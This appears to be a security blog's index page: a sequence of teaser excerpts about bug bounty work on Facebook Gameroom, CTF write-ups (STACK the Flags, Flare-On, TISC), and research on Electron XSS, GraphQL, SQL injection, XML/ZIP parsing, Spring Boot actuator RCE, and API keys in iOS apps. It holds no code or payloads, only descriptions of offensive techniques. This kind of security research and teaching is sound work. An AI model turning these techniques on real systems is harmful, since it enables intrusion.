Late last year, I was invited to Facebook's Bountycon event, which is an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, Facebook invited us to focus on Facebook Gaming. Having previously tested Facebook's assets, I knew it was going to be a tough challenge. Their security controls have only gotten tougher over the years – even simple vulnerabilities such as cross-site scripting are hard to come by, which is why they pay out so much for those. As such, top white hat hackers tend to approach Facebook from a third-party software angle, such as Orange Tsai's well-known MobileIron MDM exploits.
Given my limited time (I also started late due to an administrative issue), I decided to stay away from full-scale vulnerability research and focussed on simple audits of Facebook Gaming's access controls. However, both the mobile and web applications were well-secured, as one would expect. After a bit of digging, I came across Facebook Gameroom, a Windows-native client for playing Facebook games. I embarked on an illuminating journey of applying offensive reverse engineering to a native desktop application.
GovTech's Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.
From my experience, a significant number of vulnerabilities arise from developers' lack of familiarity with third-party libraries that they use in their code. If these libraries are compromised by malicious actors or applied in an insecure manner, developers can unknowingly introduce devastating weaknesses in their applications. The SolarWinds supply chain attack is a prime example of this.
I recently participated in FireEye's seventh annual Flare-On Challenge, a reverse engineering and malware analysis Capture The Flag (CTF) competition. Out of the 11 challenges ranging from typical executables to games written in exotic programming languages, I liked Challenge 7 the best. It featured a network traffic capture of a security breach with two stages. Having mostly worked in the red team, I enjoyed the opportunity to investigate Metasploit internals and shellcode from the perspective of a blue team.
As a beginner in malware analysis, I often found myself confused by tutorials that went from A to Z without explaining the thought process or tools used to get there. I hope that my detailed walkthrough of challenge 7 will be useful for other newcomers.
Last month, the Centre for Strategic Infocomm Technologies (CSIT) invited local cybersecurity enthusiasts to tackle the InfoSecurity Challenge (TISC). The Challenge was organized in a capture-the-flag format, with 6 cybersecurity and programming challenges of increasing difficulty unlocked one after another.
On New Year’s Eve, hackers from the PALINDROME group launched a ransomware attack on a major finance company and encrypted some of its critical data servers. Your mission is to complete a series of tasks to recover as much data as possible to prevent the company from having to give in to PALINDROME's demand. The tasks will increase in difficulty as you go along so be prepared to put up the fight of your life.
With this exciting introduction, I tackled a series of difficult problems that encompassed reverse engineering, binary exploitation, and cryptography. This took me far out of my comfort zone of application security, but since I wanted to build my skills in those areas, it was a welcome challenge.
As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.
With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron's nodeIntegration setting puts applications one XSS away from popping calc.
GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.
As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.
Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.
Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.
While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.
This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:
Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.
However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.
The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.
However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michal Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.
Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.
Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs require API keys which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client-side in the first place.